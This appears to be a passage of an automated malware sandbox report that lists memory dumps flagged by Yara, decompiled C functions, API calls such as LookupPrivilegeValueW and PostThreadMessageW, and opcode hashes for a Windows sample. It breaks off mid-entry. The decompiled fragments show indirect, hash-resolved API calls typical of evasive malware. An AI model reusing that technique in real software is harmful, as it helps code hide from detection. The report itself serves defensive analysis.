                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 705dd8df07d37f28985bb3b578f2561076a027043ccd4215f214074c70ecb61f
                                                                          • Instruction ID: 47962a35b1496f828657aac512d805a3f2d84d81aaba07c8a432479da790b69c
                                                                          • Opcode Fuzzy Hash: 705dd8df07d37f28985bb3b578f2561076a027043ccd4215f214074c70ecb61f
                                                                          • Instruction Fuzzy Hash: 8C112775E041496BCF10DBA4E842EEDB775AB54318F0441EAE90CE7283F936AE58CB45
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 43%
                                                                          			E00407260(void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
                                                                          				char _v67;
                                                                          				char _v68;
                                                                          				void* _t12;
                                                                          				intOrPtr* _t13;
                                                                          				int _t14;
                                                                          				long _t21;
                                                                          				intOrPtr* _t25;
                                                                          				void* _t26;
                                                                          				void* _t30;
                                                                          
                                                                          				_t30 = __eflags;
                                                                          				_v68 = 0;
                                                                          				E00419D20( &_v67, 0, 0x3f);
                                                                          				E0041A900( &_v68, 3);
                                                                          				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                          				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                          				_t25 = _t13;
                                                                          				if(_t25 != 0) {
                                                                          					_t21 = _a8;
                                                                          					_push(0);
                                                                          					_push(0);
                                                                          					_push(0x111);
                                                                          					 *_t13 =  *_t13 + _t13;
                                                                          					_t14 = PostThreadMessageW(_t21, ??, ??, ??); // executed
                                                                          					_t32 = _t14;
                                                                          					if(_t14 == 0) {
                                                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                          					}
                                                                          					return _t14;
                                                                          				}
                                                                          				return _t13;
                                                                          			}

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                          • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                          • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                          • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e38b4a3ca11752328516fc31a1770d010ca5d848a233b08256c029cd4fbc7abf
                                                                          • Instruction ID: 81d09adf5c81ef1f741ab8b7a9607e6be393085894e564b464267bffea62a691
                                                                          • Opcode Fuzzy Hash: e38b4a3ca11752328516fc31a1770d010ca5d848a233b08256c029cd4fbc7abf
                                                                          • Instruction Fuzzy Hash: 25F027B9504300BFDB21CF249C81ED33B5AAF55308F12425FF85947742DA34D952CAB5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 4cc6bd92fdad7af9d965fe5b36e06ccf12bc5a3907220f95130b4532a2e7092a
                                                                          • Instruction ID: b492ee65ba8bc85551817de21ab0afc2df0ea4206b9bc69b9402acfe1ba14197
                                                                          • Opcode Fuzzy Hash: 4cc6bd92fdad7af9d965fe5b36e06ccf12bc5a3907220f95130b4532a2e7092a
                                                                          • Instruction Fuzzy Hash: CEF0A0B2600214ABCB20DF94DC80EE77768EF45390F214569FA1C97241DA3199558BE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: c95f3f5b4541407be756903fb573f4315997178a7ec17d53fe996b01ffaf1364
                                                                          • Instruction ID: 6da4f28ee51dfecb3d60f010f74f6e954b6275d5870eac05df03b05b21d7113b
                                                                          • Opcode Fuzzy Hash: c95f3f5b4541407be756903fb573f4315997178a7ec17d53fe996b01ffaf1364
                                                                          • Instruction Fuzzy Hash: FCE07D11E462142DD31251546C02EBF3B4897E2701F0004FFFD40D89C2D498041982F2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                          				void* _t10;
                                                                          
                                                                          				E00418DC0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                          				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                          				return _t10;
                                                                          			}

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                          				int _t10;
                                                                          
                                                                          				E00418DC0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                          				return _t10;
                                                                          			}

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00418510(intOrPtr _a4, int _a8) {
                                                                          
                                                                          				_t5 = _a4;
                                                                          				E00418DC0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                          				ExitProcess(_a8);
                                                                          			}

                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          E004185D6(void* __ebx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                          	int _t14;
                                                                          	intOrPtr _t15;   /* _t15 and _t3 are used below but were left undeclared in the decompiler output */
                                                                          	intOrPtr _t3;
                                                                          	intOrPtr* _t35;
                                                                          	void* _t37;
                                                                          
                                                                          	if(__ebx - 1 >= 0) {
                                                                          		/* direct path: the privilege lookup goes through the imported ADVAPI32 entry */
                                                                          		_t14 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
                                                                          		return _t14;
                                                                          	} else {
                                                                          		/* indirect path: the call target is read from a pointer stored at _a4+0xc88,
                                                                          		   after E00418DC0 has been invoked with that slot, so the call does not go
                                                                          		   through the import table; 0x78edac45 is passed as recorded in the dump */
                                                                          		_t15 = _a4;
                                                                          		_t3 = _t15 + 0xc88; // 0xd8c
                                                                          		_t35 = _t3;
                                                                          		E00418DC0(_a4, _t35,  *((intOrPtr*)(_t15 + 0xa14)), 0, 0x39);
                                                                          		return  *((intOrPtr*)( *_t35))(_a8, _a12, _a16, _a20, _a24, _a28, 0x78edac45, _t37);
                                                                          	}
                                                                          }

                                                                          Instruction addresses from the listing: 0x004185d9, 0x00418660, 0x00418664, 0x004185db, 0x004185e3, 0x004185f2, 0x004185f2, 0x004185fa, 0x00418620, 0x00418620

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 9f8115ff1769d31a6f7f52e36d999440d1c0a573dd99967d02bf22a94f21daa9
                                                                          • Instruction ID: c1232d1a8e4e99d6700dad9e163c6271c5d2c8c15c6dedabe14bd1bef052e82d
                                                                          • Opcode Fuzzy Hash: 9f8115ff1769d31a6f7f52e36d999440d1c0a573dd99967d02bf22a94f21daa9
                                                                          • Instruction Fuzzy Hash: 15D0C9B5200518AF8B04EE4AD8908AB73A9AF882247258659FC0997301CA31ED268AB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
                                                                          • Instruction ID: 8a38b42fe32e271f9afc1009965e08f4e64431d8948f43410f85fe4134f53a69
                                                                          • Opcode Fuzzy Hash: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
                                                                          • Instruction Fuzzy Hash: 8FB092B29064C5CAEB11E7B04A08B2B7E04BBE0741F27C076E2120681B4778C491F6B6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 88e0cd9bbf4904eb1011bb4b51c7b60bec9a24336ad4e72f8cb6031bf7ce0226
                                                                          • Instruction ID: bab2ec68b729f3880b2902b80368e3dc9c664114894f48a5505ef08b9db17af5
                                                                          • Opcode Fuzzy Hash: 88e0cd9bbf4904eb1011bb4b51c7b60bec9a24336ad4e72f8cb6031bf7ce0226
                                                                          • Instruction Fuzzy Hash: F8D0A73396A29547C3114D5868464F7FB64A54303BB4013DEDD98A60D2D3018212C6DE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 400603f45bf8f249d18891f68da473841082a73bcd72171d17145baa968528ba
                                                                          • Instruction ID: 42212950729f972be36f0539311558b516623c630c4cac4f68a7951c03aa4294
                                                                          • Opcode Fuzzy Hash: 400603f45bf8f249d18891f68da473841082a73bcd72171d17145baa968528ba
                                                                          • Instruction Fuzzy Hash: 06C09B23F1615445D5115D6D7C42174F7649747564D046397EC5C731125482DC6107CD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e8211b21727fe2ba57bb0df9a985a85827ea0563b8c026428fddb45f9511873
                                                                          • Instruction ID: 3d5af1a720ec26eb11f3ece172e70270e194f940f542ea6ebd1e22bb9b08fef6
                                                                          • Opcode Fuzzy Hash: 0e8211b21727fe2ba57bb0df9a985a85827ea0563b8c026428fddb45f9511873
                                                                          • Instruction Fuzzy Hash: 4890026130500402D30261694414B060009D7D1385F92C036E1514595D86658953F172
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: df804f6c69e7b9c6379c798f03399d7e28abe75afd5ebfb7aa6381a0bd583336
                                                                          • Instruction ID: 6c53177ca3f6b5fae878caef4134b5b9331b09dcc816946c058a6313d29f18d7
                                                                          • Opcode Fuzzy Hash: df804f6c69e7b9c6379c798f03399d7e28abe75afd5ebfb7aa6381a0bd583336
                                                                          • Instruction Fuzzy Hash: A290027124500402D34171694404B060009A7D0381F92C036A0514594E86958A56FAA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3304b1fc7c6080feefccfad05be655d3238f6e5224e06cd2d2b4aa93dd240871
                                                                          • Instruction ID: f75ae7e81ae6304e22298c47aa7224f5cf6bbeb007eda64a760a0272a49d338e
                                                                          • Opcode Fuzzy Hash: 3304b1fc7c6080feefccfad05be655d3238f6e5224e06cd2d2b4aa93dd240871
                                                                          • Instruction Fuzzy Hash: 7E9002A1605140434740B16948049065015A7E1341392C135A05445A0C86A88855E2A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47f9a9a2c6899d86784f38a22dbe98b11c2bb291b440ea22422170e0c23633dd
                                                                          • Instruction ID: 3eb2ec0cdb3d3ec0676796c684d826ff344240f7868fec35be3edd68acdfbfe3
                                                                          • Opcode Fuzzy Hash: 47f9a9a2c6899d86784f38a22dbe98b11c2bb291b440ea22422170e0c23633dd
                                                                          • Instruction Fuzzy Hash: 1F9002A121500042D30461694404B06004597E1341F52C036A2244594CC5698C61A165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6ca344f6059146b47eb8b24c8fe54dc59e2eab76669155b78ca4a2e6a5d9e42e
                                                                          • Instruction ID: 35f0725ba9862cabd772c52fcb1dbbb05b1879467df495e1ff68a05124c4ab35
                                                                          • Opcode Fuzzy Hash: 6ca344f6059146b47eb8b24c8fe54dc59e2eab76669155b78ca4a2e6a5d9e42e
                                                                          • Instruction Fuzzy Hash: 319002A120540403D34065694804B07000597D0342F52C035A2154595E8A698C51B175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b20bf7e1c48501ea1a25d39765dfb26d0dafa2e0a84d9b94f2d7fba16005a2de
                                                                          • Instruction ID: 7029dda305442e1b1190bc795444c3c4ee646d59978d335548847ba5849de1c5
                                                                          • Opcode Fuzzy Hash: b20bf7e1c48501ea1a25d39765dfb26d0dafa2e0a84d9b94f2d7fba16005a2de
                                                                          • Instruction Fuzzy Hash: D990026120544442D34062694804F0F410597E1342F92C03DA4246594CC9558855A761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 12893d1f66c4ada2664070d9afac2df0daae0f4d326820bce6525651a146a9b9
                                                                          • Instruction ID: 5138a3ffa0ff4b38a94ddc0af292694174841e4730c3d11c0ebdd8b2c77e2124
                                                                          • Opcode Fuzzy Hash: 12893d1f66c4ada2664070d9afac2df0daae0f4d326820bce6525651a146a9b9
                                                                          • Instruction Fuzzy Hash: C190027120540402D30061694808B47000597D0342F52C035A5254595E86A5C891B571
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c26952f97a65e1633246dba56137aa9ba2b5139873da8ea887393781c2cdc93
                                                                          • Instruction ID: 062e2342a8216098ddeeb0e5edddf36eabd6e7aafbff9f98a6e913044de104b5
                                                                          • Opcode Fuzzy Hash: 0c26952f97a65e1633246dba56137aa9ba2b5139873da8ea887393781c2cdc93
                                                                          • Instruction Fuzzy Hash: F490027120544002D34071698444B0B5005A7E0341F52C435E0515594C86558856E261
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0dcadaa1b63827bb3627ac7d6985336357b0e25e0e1d07cc0a850649b072018
                                                                          • Instruction ID: 35fa8ce29d23dc4a31ce47c37f4a28a7283f933d93ffa76d82c218abe2352bf5
                                                                          • Opcode Fuzzy Hash: c0dcadaa1b63827bb3627ac7d6985336357b0e25e0e1d07cc0a850649b072018
                                                                          • Instruction Fuzzy Hash: 2590026124500802D34071698414B070006D7D0741F52C035A0114594D86568965B6F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e2113b14bc484459fbb86e61123a8f83ab9b5a9b2dad41bad9042a47b9cb06c
                                                                          • Instruction ID: ed6be8a705f1f99ec2925b122e226e47ca715ea7f66ea622bddd2c9e1b2107ba
                                                                          • Opcode Fuzzy Hash: 0e2113b14bc484459fbb86e61123a8f83ab9b5a9b2dad41bad9042a47b9cb06c
                                                                          • Instruction Fuzzy Hash: BD90027120500802D30461694804B86000597D0341F52C035A6114695E96A58891B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: add9bab60737f7f7ba5a81373750a82865a8c2ff13d4dbfab44601ab0723e2f1
                                                                          • Instruction ID: a40986a61de035ca1deb007017e058ca5b8c1f0627919953ee223e5ded9b15a5
                                                                          • Opcode Fuzzy Hash: add9bab60737f7f7ba5a81373750a82865a8c2ff13d4dbfab44601ab0723e2f1
                                                                          • Instruction Fuzzy Hash: 239002E1205140924700A2698404F0A450597E0341B52C03AE11445A0CC5658851E175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 95fd52f1bce1ecd8d071973ab841f865fd9f0ff9f722ecf0c37a3f197796d31f
                                                                          • Instruction ID: 5b81e486b5d4539877e3a6433a19d3b6de9dc8f3256072923b218d431a09c67b
                                                                          • Opcode Fuzzy Hash: 95fd52f1bce1ecd8d071973ab841f865fd9f0ff9f722ecf0c37a3f197796d31f
                                                                          • Instruction Fuzzy Hash: 6C900271A0900012934071694814B464006A7E0781B56C035A0604594C89948A55A3E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 73f4bf5880e6f94489d74f0b234c55ea0141302af988571524e8edcd4c7c3316
                                                                          • Instruction ID: 6c2f8a19244e812241081d30dcb70f43dcdff8f02f24bb6a79f8744fdf53db68
                                                                          • Opcode Fuzzy Hash: 73f4bf5880e6f94489d74f0b234c55ea0141302af988571524e8edcd4c7c3316
                                                                          • Instruction Fuzzy Hash: 3F900265225000020345A5690604A0B0445A7D6391392C039F15065D0CC6618865A361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67600f62cd35d224edd333db3325c75a2f9469fa40de186bebd4ba0ce09cca48
                                                                          • Instruction ID: fb575ff8cfa5ee648c23addf5987a082e8a26b5af66340ad18b81a3f79ad7e67
                                                                          • Opcode Fuzzy Hash: 67600f62cd35d224edd333db3325c75a2f9469fa40de186bebd4ba0ce09cca48
                                                                          • Instruction Fuzzy Hash: 5490027120500842D30061694404F46000597E0341F52C03AA0214694D8655C851B561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4713a286106670c80f211357841a4488566ab18476fb25ccb6ab9fb6a892d485
                                                                          • Instruction ID: 89d22fcf2b6f08c97e692b5398c26ac0dee9abfa238ef4b11e3b99c0f9003f80
                                                                          • Opcode Fuzzy Hash: 4713a286106670c80f211357841a4488566ab18476fb25ccb6ab9fb6a892d485
                                                                          • Instruction Fuzzy Hash: 2F90027160900802D35071694414B46000597D0341F52C035A0114694D87958A55B6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b6ea5b3d13714d781358bf8a5f3c7c785572597c955bf31040a6b18f35d3521c
                                                                          • Instruction ID: 48db54c47d282b32d5aa0cc7158c4e10406cd6b064d8023c1ad0eddd854dcc2a
                                                                          • Opcode Fuzzy Hash: b6ea5b3d13714d781358bf8a5f3c7c785572597c955bf31040a6b18f35d3521c
                                                                          • Instruction Fuzzy Hash: 6790027120904842D34071694404F46001597D0345F52C035A01546D4D96658D55F6A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0b4f155f5301873da2c0df0726af076bc39bf9367bef183bde372dffa977678
                                                                          • Instruction ID: 133f25e20edba5eec6c66537ff6acf3799fd51e7aafa144d3ac0cf8f79806eb1
                                                                          • Opcode Fuzzy Hash: c0b4f155f5301873da2c0df0726af076bc39bf9367bef183bde372dffa977678
                                                                          • Instruction Fuzzy Hash: F790026160900402D34071695418B06001597D0341F52D035A0114594DC6998A55B6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1a50cf37d77eed41a34a5212c7595780acb6d614a625c751e187858ab294472d
                                                                          • Instruction ID: ad979abee1b31fb37d86e7209d2f09f58b23bb9b8142aaba8bc4d94e1f0f0964
                                                                          • Opcode Fuzzy Hash: 1a50cf37d77eed41a34a5212c7595780acb6d614a625c751e187858ab294472d
                                                                          • Instruction Fuzzy Hash: DE900271305000529700A6A95804F4A410597F0341B52D039A4104594C85948861A161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 70be82affbdc52f07e042d7c88c0ca3fe991817a71b42a08d6f420f0fd18ba17
